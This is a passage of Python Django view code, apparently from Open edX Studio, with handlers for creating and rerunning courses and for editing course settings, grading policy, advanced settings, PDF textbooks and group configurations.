            'course_key': unicode(course.location.course_key),
            'url': reverse_course_url('course_handler', course.id),
            'lms_link': get_lms_link_for_item(course.location),
            'rerun_link': _get_rerun_link_for_item(course.id),
            'org': course.display_org_with_default,
            'number': course.display_number_with_default,
            'run': course.location.run
        }

    # Use a set so each membership test below is O(1) instead of scanning a list.
    in_process_action_course_keys = {uca.course_key for uca in in_process_course_actions}
    return [
        format_course_for_view(course)
        for course in courses
        if not isinstance(course, ErrorDescriptor) and course.id not in in_process_action_course_keys
    ]
def course_outline_initial_state(locator_to_show, course_structure):
    """
    Returns the desired initial state for the course outline view. If the 'show' request parameter
    was provided, then the view's initial state will be to have the desired item fully expanded
    and to scroll to see the new item.
    """
    def _children_of(node):
        """Return the list of child xblock-info dicts for ``node``, or None."""
        child_info = node.get('child_info', None)
        return child_info['children'] if child_info else None

    def _locate(node, locator):
        """Depth-first search for the xblock info whose id matches ``locator``."""
        if node['id'] == locator:
            return node
        for child in _children_of(node) or []:
            found = _locate(child, locator)
            if found:
                return found
        return None

    def _gather_locators(node, accumulator):
        """Append the locator of ``node`` and all of its descendants to ``accumulator``."""
        accumulator.append(node['id'])
        for child in _children_of(node) or []:
            _gather_locators(child, accumulator)

    target = _locate(course_structure, locator_to_show)
    if not target:
        return None

    expanded_locators = []
    _gather_locators(target, expanded_locators)
    return {
        'locator_to_show': locator_to_show,
        'expanded_locators': expanded_locators
    }
@expect_json
def _create_or_rerun_course(request):
    """
    To be called by requests that create a new destination course (i.e., create_new_course and rerun_course)
    Returns the destination course_key and overriding fields for the new course.
    Raises DuplicateCourseError and InvalidKeyError

    Dispatches to _rerun_course when the payload contains 'source_course_key',
    otherwise to _create_new_course. Only users with the course creator role
    may call this.
    """
    if not auth.user_has_role(request.user, CourseCreatorRole()):
        raise PermissionDenied()
    try:
        org = request.json.get('org')
        # 'number' is the preferred key; fall back to the legacy 'course' key.
        course = request.json.get('number', request.json.get('course'))
        display_name = request.json.get('display_name')
        # force the start date for reruns and allow us to override start via the client
        start = request.json.get('start', CourseFields.start.default)
        run = request.json.get('run')
        # allow/disable unicode characters in course_id according to settings
        if not settings.FEATURES.get('ALLOW_UNICODE_COURSE_ID'):
            if _has_non_ascii_characters(org) or _has_non_ascii_characters(course) or _has_non_ascii_characters(run):
                return JsonResponse(
                    {'error': _('Special characters not allowed in organization, course number, and course run.')},
                    status=400
                )
        fields = {'start': start}
        if display_name is not None:
            fields['display_name'] = display_name
        # Set a unique wiki_slug for newly created courses. To maintain active wiki_slugs for
        # existing xml courses this cannot be changed in CourseDescriptor.
        # # TODO get rid of defining wiki slug in this org/course/run specific way and reconcile
        # w/ xmodule.course_module.CourseDescriptor.__init__
        wiki_slug = u"{0}.{1}.{2}".format(org, course, run)
        definition_data = {'wiki_slug': wiki_slug}
        fields.update(definition_data)
        # A 'source_course_key' in the payload distinguishes a rerun from a brand-new course.
        if 'source_course_key' in request.json:
            return _rerun_course(request, org, course, run, fields)
        else:
            return _create_new_course(request, org, course, run, fields)
    except DuplicateCourseError:
        return JsonResponse({
            'ErrMsg': _(
                'There is already a course defined with the same '
                'organization and course number. Please '
                'change either organization or course number to be unique.'
            ),
            'OrgErrMsg': _(
                'Please change either the organization or '
                'course number so that it is unique.'),
            'CourseErrMsg': _(
                'Please change either the organization or '
                'course number so that it is unique.'),
        })
    except InvalidKeyError as error:
        # NOTE(review): display_name is always bound before any call that can raise
        # InvalidKeyError (key parsing happens inside _rerun_course) — confirm if
        # new raise sites are added earlier in the try block.
        return JsonResponse({
            "ErrMsg": _("Unable to create course '{name}'.\n\n{err}").format(name=display_name, err=error.message)}
        )
def _create_new_course(request, org, number, run, fields):
    """
    Create a new course.
    Returns the URL for the course overview page.
    Raises DuplicateCourseError if the course already exists
    """
    # New courses are created in whichever modulestore is configured as the default.
    default_store_type = modulestore().default_modulestore.get_modulestore_type()
    created_course = create_new_course_in_store(default_store_type, request.user, org, number, run, fields)
    return JsonResponse({
        'url': reverse_course_url('course_handler', created_course.id),
        'course_key': unicode(created_course.id),
    })
def create_new_course_in_store(store, user, org, number, run, fields):
    """
    Create course in store w/ handling instructor enrollment, permissions, and defaulting the wiki slug.
    Separated out b/c command line course creation uses this as well as the web interface.
    """
    # Apply site-wide defaults: course language and web certificates.
    fields.update({
        'language': getattr(settings, 'DEFAULT_COURSE_LANGUAGE', 'en'),
        'cert_html_view_enabled': True,
    })

    with modulestore().default_store(store):
        # create_course raises DuplicateCourseError when an org/number/run collision exists.
        new_course = modulestore().create_course(
            org,
            number,
            run,
            user.id,
            fields=fields,
        )

    # Grant the creator instructor/staff rights and seed the course permissions.
    add_instructor(new_course.id, user, user)
    initialize_permissions(new_course.id, user)
    return new_course
def _rerun_course(request, org, number, run, fields):
    """
    Reruns an existing course.
    Returns the URL for the course listing page.
    """
    source_course_key = CourseKey.from_string(request.json.get('source_course_key'))

    # The requesting user must have studio write access to the source course.
    if not has_studio_write_access(request.user, source_course_key):
        raise PermissionDenied()

    store = modulestore()
    # Reruns are always created in the split modulestore.
    with store.default_store('split'):
        destination_course_key = store.make_course_key(org, number, run)

    # Refuse to overwrite an existing course (case-insensitive match).
    if store.has_course(destination_course_key, ignore_case=True):
        raise DuplicateCourseError(source_course_key, destination_course_key)

    # Give the user instructor and staff access to the destination course so the
    # in-progress rerun (and its status) shows up on their course listing.
    add_instructor(destination_course_key, request.user, request.user)

    # Record that the rerun has been initiated.
    CourseRerunState.objects.initiated(source_course_key, destination_course_key, request.user, fields['display_name'])

    # advertised_start must not carry over to the rerun.
    fields['advertised_start'] = None

    # Kick off the actual course copy asynchronously.
    rerun_course.delay(
        unicode(source_course_key),
        unicode(destination_course_key),
        request.user.id,
        json.dumps(fields, cls=EdxJSONEncoder),
    )

    return JsonResponse({
        'url': reverse_url('course_handler'),
        'destination_course_key': unicode(destination_course_key)
    })
# pylint: disable=unused-argument
@login_required
@ensure_csrf_cookie
@require_http_methods(["GET"])
def course_info_handler(request, course_key_string):
    """
    GET
        html: return html for editing the course info handouts and updates.
    """
    try:
        course_key = CourseKey.from_string(course_key_string)
    except InvalidKeyError:
        raise Http404

    with modulestore().bulk_operations(course_key):
        course_module = get_course_and_check_access(course_key, request.user)
        if not course_module:
            raise Http404

        # Only an HTML representation is supported by this endpoint.
        if 'text/html' not in request.META.get('HTTP_ACCEPT', 'text/html'):
            return HttpResponseBadRequest("Only supports html requests")

        return render_to_response(
            'course_info.html',
            {
                'context_course': course_module,
                'updates_url': reverse_course_url('course_info_update_handler', course_key),
                'handouts_locator': course_key.make_usage_key('course_info', 'handouts'),
                'base_asset_url': StaticContent.get_base_url_path_for_course_assets(course_module.id),
                'push_notification_enabled': push_notification_enabled()
            }
        )
# pylint: disable=unused-argument
@login_required
@ensure_csrf_cookie
@require_http_methods(("GET", "POST", "PUT", "DELETE"))
@expect_json
def course_info_update_handler(request, course_key_string, provided_id=None):
    """
    restful CRUD operations on course_info updates.
    provided_id should be none if it's new (create) and index otherwise.
    GET
        json: return the course info update models
    POST
        json: create an update
    PUT or DELETE
        json: change an existing update
    """
    if 'application/json' not in request.META.get('HTTP_ACCEPT', 'application/json'):
        return HttpResponseBadRequest("Only supports json requests")

    course_key = CourseKey.from_string(course_key_string)
    usage_key = course_key.make_usage_key('course_info', 'updates')
    # An empty-string id from the URL means "no id" (create).
    if provided_id == '':
        provided_id = None

    # check that logged in user has permissions to this item (GET shouldn't require this level?)
    if not has_studio_write_access(request.user, usage_key.course_key):
        raise PermissionDenied()

    if request.method == 'GET':
        course_updates = get_course_updates(usage_key, provided_id, request.user.id)
        if isinstance(course_updates, dict) and course_updates.get('error'):
            return JsonResponse(course_updates, course_updates.get('status', 400))
        else:
            return JsonResponse(course_updates)
    elif request.method == 'DELETE':
        try:
            return JsonResponse(delete_course_update(usage_key, request.json, provided_id, request.user))
        # BUG FIX: was a bare "except:", which also swallows SystemExit and
        # KeyboardInterrupt; catch Exception so those still propagate.
        except Exception:
            return HttpResponseBadRequest(
                "Failed to delete",
                content_type="text/plain"
            )
    # can be either and sometimes django is rewriting one to the other:
    elif request.method in ('POST', 'PUT'):
        try:
            return JsonResponse(update_course_updates(usage_key, request.json, provided_id, request.user))
        # BUG FIX: same bare-except narrowing as the DELETE branch above.
        except Exception:
            return HttpResponseBadRequest(
                "Failed to save",
                content_type="text/plain"
            )
@login_required
@ensure_csrf_cookie
@require_http_methods(("GET", "PUT", "POST"))
@expect_json
def settings_handler(request, course_key_string):
    """
    Course settings for dates and about pages
    GET
        html: get the page
        json: get the CourseDetails model
    PUT
        json: update the Course and About xblocks through the CourseDetails model

    The PUT/POST JSON branch also processes two optional, feature-gated inputs
    from the payload: 'pre_requisite_courses' and the entrance-exam settings.
    """
    course_key = CourseKey.from_string(course_key_string)
    credit_eligibility_enabled = settings.FEATURES.get('ENABLE_CREDIT_ELIGIBILITY', False)
    with modulestore().bulk_operations(course_key):
        course_module = get_course_and_check_access(course_key, request.user)
        # HTML GET: render the schedule & details settings page.
        if 'text/html' in request.META.get('HTTP_ACCEPT', '') and request.method == 'GET':
            upload_asset_url = reverse_course_url('assets_handler', course_key)
            # see if the ORG of this course can be attributed to a 'Microsite'. In that case, the
            # course about page should be editable in Studio
            marketing_site_enabled = microsite.get_value_for_org(
                course_module.location.org,
                'ENABLE_MKTG_SITE',
                settings.FEATURES.get('ENABLE_MKTG_SITE', False)
            )
            about_page_editable = not marketing_site_enabled
            enrollment_end_editable = GlobalStaff().has_user(request.user) or not marketing_site_enabled
            short_description_editable = settings.FEATURES.get('EDITABLE_SHORT_DESCRIPTION', True)
            self_paced_enabled = SelfPacedConfiguration.current().enabled
            settings_context = {
                'context_course': course_module,
                'course_locator': course_key,
                'lms_link_for_about_page': utils.get_lms_link_for_about_page(course_key),
                'course_image_url': utils.course_image_url(course_module),
                'details_url': reverse_course_url('settings_handler', course_key),
                'about_page_editable': about_page_editable,
                'short_description_editable': short_description_editable,
                'upload_asset_url': upload_asset_url,
                'course_handler_url': reverse_course_url('course_handler', course_key),
                'language_options': settings.ALL_LANGUAGES,
                'credit_eligibility_enabled': credit_eligibility_enabled,
                'is_credit_course': False,
                'show_min_grade_warning': False,
                'enrollment_end_editable': enrollment_end_editable,
                'is_prerequisite_courses_enabled': is_prerequisite_courses_enabled(),
                'is_entrance_exams_enabled': is_entrance_exams_enabled(),
                'self_paced_enabled': self_paced_enabled,
            }
            # Offer the user's other accessible courses as possible prerequisites (feature-gated).
            if is_prerequisite_courses_enabled():
                courses, in_process_course_actions = get_courses_accessible_to_user(request)
                # exclude current course from the list of available courses
                courses = [course for course in courses if course.id != course_key]
                if courses:
                    courses = _remove_in_process_courses(courses, in_process_course_actions)
                settings_context.update({'possible_pre_requisite_courses': courses})
            if credit_eligibility_enabled:
                if is_credit_course(course_key):
                    # get and all credit eligibility requirements
                    credit_requirements = get_credit_requirements(course_key)
                    # pair together requirements with same 'namespace' values
                    paired_requirements = {}
                    for requirement in credit_requirements:
                        namespace = requirement.pop("namespace")
                        paired_requirements.setdefault(namespace, []).append(requirement)
                    # if 'minimum_grade_credit' of a course is not set or 0 then
                    # show warning message to course author.
                    show_min_grade_warning = False if course_module.minimum_grade_credit > 0 else True
                    settings_context.update(
                        {
                            'is_credit_course': True,
                            'credit_requirements': paired_requirements,
                            'show_min_grade_warning': show_min_grade_warning,
                        }
                    )
            return render_to_response('settings.html', settings_context)
        elif 'application/json' in request.META.get('HTTP_ACCEPT', ''):
            if request.method == 'GET':
                course_details = CourseDetails.fetch(course_key)
                return JsonResponse(
                    course_details,
                    # encoder serializes dates, old locations, and instances
                    encoder=CourseSettingsEncoder
                )
            # For every other possible method type submitted by the caller...
            else:
                # if pre-requisite course feature is enabled set pre-requisite course
                if is_prerequisite_courses_enabled():
                    prerequisite_course_keys = request.json.get('pre_requisite_courses', [])
                    if prerequisite_course_keys:
                        if not all(is_valid_course_key(course_key) for course_key in prerequisite_course_keys):
                            return JsonResponseBadRequest({"error": _("Invalid prerequisite course key")})
                        set_prerequisite_courses(course_key, prerequisite_course_keys)
                # If the entrance exams feature has been enabled, we'll need to check for some
                # feature-specific settings and handle them accordingly
                # We have to be careful that we're only executing the following logic if we actually
                # need to create or delete an entrance exam from the specified course
                if is_entrance_exams_enabled():
                    course_entrance_exam_present = course_module.entrance_exam_enabled
                    # The client submits the checkbox state as the string 'true'.
                    entrance_exam_enabled = request.json.get('entrance_exam_enabled', '') == 'true'
                    ee_min_score_pct = request.json.get('entrance_exam_minimum_score_pct', None)
                    # If the entrance exam box on the settings screen has been checked...
                    if entrance_exam_enabled:
                        # Load the default minimum score threshold from settings, then try to override it
                        entrance_exam_minimum_score_pct = float(settings.ENTRANCE_EXAM_MIN_SCORE_PCT)
                        if ee_min_score_pct:
                            entrance_exam_minimum_score_pct = float(ee_min_score_pct)
                        # Whole-number input (e.g. 75) is treated as a percentage and
                        # converted to a fraction; fractional input is used as-is.
                        if entrance_exam_minimum_score_pct.is_integer():
                            entrance_exam_minimum_score_pct = entrance_exam_minimum_score_pct / 100
                        entrance_exam_minimum_score_pct = unicode(entrance_exam_minimum_score_pct)
                        # If there's already an entrance exam defined, we'll update the existing one
                        if course_entrance_exam_present:
                            exam_data = {
                                'entrance_exam_minimum_score_pct': entrance_exam_minimum_score_pct
                            }
                            update_entrance_exam(request, course_key, exam_data)
                        # If there's no entrance exam defined, we'll create a new one
                        else:
                            create_entrance_exam(request, course_key, entrance_exam_minimum_score_pct)
                    # If the entrance exam box on the settings screen has been unchecked,
                    # and the course has an entrance exam attached...
                    elif not entrance_exam_enabled and course_entrance_exam_present:
                        delete_entrance_exam(request, course_key)
                # Perform the normal update workflow for the CourseDetails model
                return JsonResponse(
                    CourseDetails.update_from_json(course_key, request.json, request.user),
                    encoder=CourseSettingsEncoder
                )
@login_required
@ensure_csrf_cookie
@require_http_methods(("GET", "POST", "PUT", "DELETE"))
@expect_json
def grading_handler(request, course_key_string, grader_index=None):
    """
    Course Grading policy configuration
    GET
        html: get the page
        json no grader_index: get the CourseGrading model (graceperiod, cutoffs, and graders)
        json w/ grader_index: get the specific grader
    PUT
        json no grader_index: update the Course through the CourseGrading model
        json w/ grader_index: create or update the specific grader (create if index out of range)
    DELETE
        json w/ grader_index: remove the specific grader
    """
    course_key = CourseKey.from_string(course_key_string)
    with modulestore().bulk_operations(course_key):
        course_module = get_course_and_check_access(course_key, request.user)
        # HTML GET: render the graders settings page.
        if 'text/html' in request.META.get('HTTP_ACCEPT', '') and request.method == 'GET':
            course_details = CourseGradingModel.fetch(course_key)
            return render_to_response('settings_graders.html', {
                'context_course': course_module,
                'course_locator': course_key,
                'course_details': course_details,
                'grading_url': reverse_course_url('grading_handler', course_key),
                'is_credit_course': is_credit_course(course_key),
            })
        elif 'application/json' in request.META.get('HTTP_ACCEPT', ''):
            if request.method == 'GET':
                if grader_index is None:
                    return JsonResponse(
                        CourseGradingModel.fetch(course_key),
                        # encoder serializes dates, old locations, and instances
                        encoder=CourseSettingsEncoder
                    )
                else:
                    return JsonResponse(CourseGradingModel.fetch_grader(course_key, grader_index))
            elif request.method in ('POST', 'PUT'):  # post or put, doesn't matter.
                # update credit course requirements if 'minimum_grade_credit'
                # field value is changed
                if 'minimum_grade_credit' in request.json:
                    update_credit_course_requirements.delay(unicode(course_key))
                # None implies update the whole model (cutoffs, graceperiod, and graders) not a specific grader
                if grader_index is None:
                    return JsonResponse(
                        CourseGradingModel.update_from_json(course_key, request.json, request.user),
                        encoder=CourseSettingsEncoder
                    )
                else:
                    return JsonResponse(
                        CourseGradingModel.update_grader_from_json(course_key, request.json, request.user)
                    )
            elif request.method == "DELETE" and grader_index is not None:
                CourseGradingModel.delete_grader(course_key, grader_index, request.user)
                return JsonResponse()
            # NOTE(review): a DELETE without grader_index, or an Accept header matching
            # neither branch, falls through and implicitly returns None — confirm intended.
def _refresh_course_tabs(request, course_module):
    """
    Automatically adds/removes tabs if changes to the course require them.

    Raises:
        InvalidTabsException: raised if there's a problem with the new version of the tabs.
    """
    def update_tab(tabs, tab_type, tab_enabled):
        """
        Adds or removes a course tab based upon whether it is enabled.
        """
        tab_panel = {
            "type": tab_type.type,
        }
        has_tab = tab_panel in tabs
        if tab_enabled and not has_tab:
            tabs.append(CourseTab.from_json(tab_panel))
        elif not tab_enabled and has_tab:
            tabs.remove(tab_panel)

    # Work on a shallow copy so we can detect below whether anything changed.
    course_tabs = copy.copy(course_module.tabs)

    # Additionally update any tabs that are provided by non-dynamic course views
    for tab_type in CourseTabPluginManager.get_tab_types():
        # Dynamic tabs manage themselves; only sync default, non-dynamic tab types.
        if tab_type.is_dynamic or not tab_type.is_default:
            continue
        update_tab(course_tabs, tab_type, tab_type.is_enabled(course_module, user=request.user))

    CourseTabList.validate_tabs(course_tabs)

    # Save the tabs into the course only if they have been changed
    if course_tabs != course_module.tabs:
        course_module.tabs = course_tabs
@login_required
@ensure_csrf_cookie
@require_http_methods(("GET", "POST", "PUT"))
@expect_json
def advanced_settings_handler(request, course_key_string):
    """
    Course settings configuration
    GET
        html: get the page
        json: get the model
    PUT, POST
        json: update the Course's settings. The payload is a json rep of the
            metadata dicts.
    """
    course_key = CourseKey.from_string(course_key_string)
    with modulestore().bulk_operations(course_key):
        course_module = get_course_and_check_access(course_key, request.user)
        if 'text/html' in request.META.get('HTTP_ACCEPT', '') and request.method == 'GET':
            return render_to_response('settings_advanced.html', {
                'context_course': course_module,
                'advanced_dict': CourseMetadata.fetch(course_module),
                'advanced_settings_url': reverse_course_url('advanced_settings_handler', course_key)
            })
        elif 'application/json' in request.META.get('HTTP_ACCEPT', ''):
            if request.method == 'GET':
                return JsonResponse(CourseMetadata.fetch(course_module))
            else:
                try:
                    # validate data formats and update the course module.
                    # Note: don't update mongo yet, but wait until after any tabs are changed
                    is_valid, errors, updated_data = CourseMetadata.validate_and_update_from_json(
                        course_module,
                        request.json,
                        user=request.user,
                    )
                    if is_valid:
                        try:
                            # update the course tabs if required by any setting changes
                            # (mutates course_module in place; the single update_item
                            # below then persists both the settings and tab changes)
                            _refresh_course_tabs(request, course_module)
                        except InvalidTabsException as err:
                            log.exception(err.message)
                            response_message = [
                                {
                                    'message': _('An error occurred while trying to save your tabs'),
                                    'model': {'display_name': _('Tabs Exception')}
                                }
                            ]
                            return JsonResponseBadRequest(response_message)
                        # now update mongo
                        modulestore().update_item(course_module, request.user.id)
                        return JsonResponse(updated_data)
                    else:
                        return JsonResponseBadRequest(errors)
                # Handle all errors that validation doesn't catch
                except (TypeError, ValueError, InvalidTabsException) as err:
                    return HttpResponseBadRequest(
                        django.utils.html.escape(err.message),
                        content_type="text/plain"
                    )
class TextbookValidationError(Exception):
    """An error thrown when a textbook input is invalid."""
def validate_textbooks_json(text):
    """
    Validate ``text`` as a JSON list of PDF textbooks.

    Returns the parsed list; raises TextbookValidationError on any problem
    (bad JSON, non-list payload, invalid entry, or duplicate IDs).
    """
    try:
        textbooks = json.loads(text)
    except ValueError:
        raise TextbookValidationError("invalid JSON")
    if not isinstance(textbooks, (list, tuple)):
        raise TextbookValidationError("must be JSON list")

    # Each entry must individually be a valid textbook.
    for textbook in textbooks:
        validate_textbook_json(textbook)

    # Any explicitly-specified IDs must be unique across the collection.
    specified_ids = [textbook["id"] for textbook in textbooks if "id" in textbook]
    if len(specified_ids) != len(set(specified_ids)):
        raise TextbookValidationError("IDs must be unique")

    return textbooks
def validate_textbook_json(textbook):
    """
    Validate a single PDF textbook entry.

    ``textbook`` may be a JSON string or an already-parsed dict. Returns the
    dict form; raises TextbookValidationError on any problem.
    """
    # Accept a raw JSON string and parse it into a dict first.
    if isinstance(textbook, basestring):
        try:
            textbook = json.loads(textbook)
        except ValueError:
            raise TextbookValidationError("invalid JSON")
    if not isinstance(textbook, dict):
        raise TextbookValidationError("must be JSON object")
    if not textbook.get("tab_title"):
        raise TextbookValidationError("must have tab_title")

    # An explicit ID, when present, must begin with a digit.
    textbook_id = unicode(textbook.get("id", ""))
    if textbook_id and not textbook_id[0].isdigit():
        raise TextbookValidationError("textbook ID must start with a digit")

    return textbook
def assign_textbook_id(textbook, used_ids=()):
    """
    Return an ID that can be assigned to a textbook
    and doesn't match the used_ids
    """
    candidate = Location.clean(textbook["tab_title"])
    if not candidate[0].isdigit():
        # IDs must start with a digit; prepend a random one.
        candidate = random.choice(string.digits) + candidate
    # Extend with random lowercase letters until the ID is unique.
    while candidate in used_ids:
        candidate = candidate + random.choice(string.ascii_lowercase)
    return candidate
@require_http_methods(("GET", "POST", "PUT"))
@login_required
@ensure_csrf_cookie
def textbooks_list_handler(request, course_key_string):
    """
    A RESTful handler for textbook collections.
    GET
        html: return textbook list page (Backbone application)
        json: return JSON representation of all textbooks in this course
    POST
        json: create a new textbook for this course
    PUT
        json: overwrite all textbooks in the course with the given list
    """
    course_key = CourseKey.from_string(course_key_string)
    store = modulestore()
    with store.bulk_operations(course_key):
        course = get_course_and_check_access(course_key, request.user)
        if "application/json" not in request.META.get('HTTP_ACCEPT', 'text/html'):
            # return HTML page
            upload_asset_url = reverse_course_url('assets_handler', course_key)
            textbook_url = reverse_course_url('textbooks_list_handler', course_key)
            return render_to_response('textbooks.html', {
                'context_course': course,
                'textbooks': course.pdf_textbooks,
                'upload_asset_url': upload_asset_url,
                'textbook_url': textbook_url,
            })
        # from here on down, we know the client has requested JSON
        if request.method == 'GET':
            return JsonResponse(course.pdf_textbooks)
        elif request.method == 'PUT':
            try:
                textbooks = validate_textbooks_json(request.body)
            except TextbookValidationError as err:
                return JsonResponse({"error": err.message}, status=400)
            # Assign IDs to any textbooks submitted without one, avoiding
            # collisions with IDs already present in the payload.
            tids = set(t["id"] for t in textbooks if "id" in t)
            for textbook in textbooks:
                if "id" not in textbook:
                    tid = assign_textbook_id(textbook, tids)
                    textbook["id"] = tid
                    tids.add(tid)
            # Ensure the Textbooks tab exists before saving the new collection.
            if not any(tab['type'] == 'pdf_textbooks' for tab in course.tabs):
                course.tabs.append(CourseTab.load('pdf_textbooks'))
            course.pdf_textbooks = textbooks
            store.update_item(course, request.user.id)
            return JsonResponse(course.pdf_textbooks)
        elif request.method == 'POST':
            # create a new textbook for the course
            try:
                textbook = validate_textbook_json(request.body)
            except TextbookValidationError as err:
                return JsonResponse({"error": err.message}, status=400)
            if not textbook.get("id"):
                tids = set(t["id"] for t in course.pdf_textbooks if "id" in t)
                textbook["id"] = assign_textbook_id(textbook, tids)
            # NOTE(review): appends via a local alias and then reassigns
            # pdf_textbooks — presumably to mark the field modified; confirm.
            existing = course.pdf_textbooks
            existing.append(textbook)
            course.pdf_textbooks = existing
            if not any(tab['type'] == 'pdf_textbooks' for tab in course.tabs):
                course.tabs.append(CourseTab.load('pdf_textbooks'))
            store.update_item(course, request.user.id)
            resp = JsonResponse(textbook, status=201)
            # Point the client at the canonical URL for the new resource.
            resp["Location"] = reverse_course_url(
                'textbooks_detail_handler',
                course.id,
                kwargs={'textbook_id': textbook["id"]}
            )
            return resp
@login_required
@ensure_csrf_cookie
@require_http_methods(("GET", "POST", "PUT", "DELETE"))
def textbooks_detail_handler(request, course_key_string, textbook_id):
    """
    JSON API endpoint for manipulating a textbook via its internal ID.
    Used by the Backbone application.
    GET
        json: return JSON representation of textbook
    POST or PUT
        json: update textbook based on provided information
    DELETE
        json: remove textbook
    """
    course_key = CourseKey.from_string(course_key_string)
    store = modulestore()
    with store.bulk_operations(course_key):
        course_module = get_course_and_check_access(course_key, request.user)

        # Find the stored textbook whose ID matches; compare as text since
        # stored IDs and the URL parameter may differ in type.
        matches = [
            candidate for candidate in course_module.pdf_textbooks
            if unicode(candidate.get("id")) == unicode(textbook_id)
        ]
        textbook = matches[0] if matches else None

        if request.method == 'GET':
            if not textbook:
                return JsonResponse(status=404)
            return JsonResponse(textbook)
        elif request.method in ('POST', 'PUT'):
            # POST and PUT are equivalent here; django sometimes rewrites one to the other.
            try:
                new_textbook = validate_textbook_json(request.body)
            except TextbookValidationError as err:
                return JsonResponse({"error": err.message}, status=400)
            new_textbook["id"] = textbook_id
            if textbook:
                # Replace the existing entry in place, preserving list order.
                position = course_module.pdf_textbooks.index(textbook)
                updated_textbooks = course_module.pdf_textbooks[0:position]
                updated_textbooks.append(new_textbook)
                updated_textbooks.extend(course_module.pdf_textbooks[position + 1:])
                course_module.pdf_textbooks = updated_textbooks
            else:
                course_module.pdf_textbooks.append(new_textbook)
            store.update_item(course_module, request.user.id)
            return JsonResponse(new_textbook, status=201)
        elif request.method == 'DELETE':
            if not textbook:
                return JsonResponse(status=404)
            # Rebuild the list without the deleted entry and persist it.
            position = course_module.pdf_textbooks.index(textbook)
            remaining_textbooks = course_module.pdf_textbooks[0:position]
            remaining_textbooks.extend(course_module.pdf_textbooks[position + 1:])
            course_module.pdf_textbooks = remaining_textbooks
            store.update_item(course_module, request.user.id)
            return JsonResponse()
def remove_content_or_experiment_group(request, store, course, configuration, group_configuration_id, group_id=None):
    """
    Remove content group or experiment group configuration only if it's not in use.
    """
    configuration_index = course.user_partitions.index(configuration)
    if configuration.scheme.name == RANDOM_SCHEME:
        # Experiment configuration: refuse deletion while any split_test uses it.
        usages = GroupConfiguration.get_content_experiment_usage_info(store, course)
        if int(group_configuration_id) in usages:
            return JsonResponse(
                {"error": _("This group configuration is in use and cannot be deleted.")},
                status=400
            )
        course.user_partitions.pop(configuration_index)
    elif configuration.scheme.name == COHORT_SCHEME:
        if not group_id:
            return JsonResponse(status=404)
        group_id = int(group_id)
        # Content group: refuse deletion while any content references the group.
        usages = GroupConfiguration.get_content_groups_usage_info(store, course)
        if group_id in usages:
            return JsonResponse(
                {"error": _("This content group is in use and cannot be deleted.")},
                status=400
            )
        matching_groups = [group for group in configuration.groups if group.id == group_id]
        if not matching_groups:
            return JsonResponse(status=404)
        # Drop only the matching group, then write the partition back in place.
        configuration.groups.pop(configuration.groups.index(matching_groups[0]))
        course.user_partitions[configuration_index] = configuration
    store.update_item(course, request.user.id)
    return JsonResponse(status=204)
@require_http_methods(("GET", "POST"))
@login_required
@ensure_csrf_cookie
def group_configurations_list_handler(request, course_key_string):
    """
    A RESTful handler for Group Configurations
    GET
        html: return Group Configurations list page (Backbone application)
    POST
        json: create new group configuration
    """
    course_key = CourseKey.from_string(course_key_string)
    store = modulestore()
    with store.bulk_operations(course_key):
        course = get_course_and_check_access(course_key, request.user)
        if 'text/html' in request.META.get('HTTP_ACCEPT', 'text/html'):
            group_configuration_url = reverse_course_url('group_configurations_list_handler', course_key)
            course_outline_url = reverse_course_url('course_handler', course_key)
            should_show_experiment_groups = are_content_experiments_enabled(course)
            if should_show_experiment_groups:
                experiment_group_configurations = GroupConfiguration.get_split_test_partitions_with_usage(store, course)
            else:
                experiment_group_configurations = None
            content_group_configuration = GroupConfiguration.get_or_create_content_group(store, course)
            return render_to_response('group_configurations.html', {
                'context_course': course,
                'group_configuration_url': group_configuration_url,
                'course_outline_url': course_outline_url,
                'experiment_group_configurations': experiment_group_configurations,
                'should_show_experiment_groups': should_show_experiment_groups,
                'content_group_configuration': content_group_configuration
            })
        # BUG FIX: default HTTP_ACCEPT to '' — without a default, a missing Accept
        # header makes get() return None and "in None" raises TypeError. Every
        # other handler in this file passes a default here.
        elif "application/json" in request.META.get('HTTP_ACCEPT', ''):
            if request.method == 'POST':
                # create a new group configuration for the course
                try:
                    new_configuration = GroupConfiguration(request.body, course).get_user_partition()
                except GroupConfigurationsValidationError as err:
                    return JsonResponse({"error": err.message}, status=400)
                course.user_partitions.append(new_configuration)
                response = JsonResponse(new_configuration.to_json(), status=201)
                # Point the client at the canonical URL for the new configuration.
                response["Location"] = reverse_course_url(
                    'group_configurations_detail_handler',
                    course.id,
                    kwargs={'group_configuration_id': new_configuration.id}
                )
                store.update_item(course, request.user.id)
                return response
        else:
            return HttpResponse(status=406)
@login_required
@ensure_csrf_cookie
@require_http_methods(("POST", "PUT", "DELETE"))
def group_configurations_detail_handler(request, course_key_string, group_configuration_id, group_id=None):
    """
    JSON API endpoint for manipulating a group configuration via its internal ID.
    Used by the Backbone application.
    POST or PUT
        json: update group configuration based on provided information
    DELETE
        json: remove the group configuration (or one of its content groups)
    """
    course_key = CourseKey.from_string(course_key_string)
    store = modulestore()
    with store.bulk_operations(course_key):
        course = get_course_and_check_access(course_key, request.user)

        # Locate the partition whose ID matches; compare as text since the URL
        # parameter and stored IDs may differ in type.
        matches = [
            partition for partition in course.user_partitions
            if unicode(partition.id) == unicode(group_configuration_id)
        ]
        configuration = matches[0] if matches else None

        if request.method in ('POST', 'PUT'):
            # POST and PUT are equivalent here; django sometimes rewrites one to the other.
            try:
                new_configuration = GroupConfiguration(request.body, course, group_configuration_id).get_user_partition()
            except GroupConfigurationsValidationError as err:
                return JsonResponse({"error": err.message}, status=400)
            if configuration:
                # Replace the existing partition in place, preserving order.
                course.user_partitions[course.user_partitions.index(configuration)] = new_configuration
            else:
                course.user_partitions.append(new_configuration)
            store.update_item(course, request.user.id)
            configuration = GroupConfiguration.update_usage_info(store, course, new_configuration)
            return JsonResponse(configuration, status=201)
        elif request.method == "DELETE":
            if not configuration:
                return JsonResponse(status=404)
            return remove_content_or_experiment_group(
                request=request,
                store=store,
                course=course,
                configuration=configuration,
                group_configuration_id=group_configuration_id,
                group_id=group_id
            )
def are_content_experiments_enabled(course):
    """
    Returns True if content experiments have been enabled for the course.
    """
    # The split_test component must be known globally before we even look
    # at this particular course's advanced module list.
    if SPLIT_TEST_COMPONENT_TYPE not in ADVANCED_COMPONENT_TYPES:
        return False
    return SPLIT_TEST_COMPONENT_TYPE in course.advanced_modules
def _get_course_creator_status(user):
    """
    Helper method for returning the course creator status for a particular user,
    taking into account the values of DISABLE_COURSE_CREATION and ENABLE_CREATOR_GROUP.

    If the user passed in has not previously visited the index page, it will be
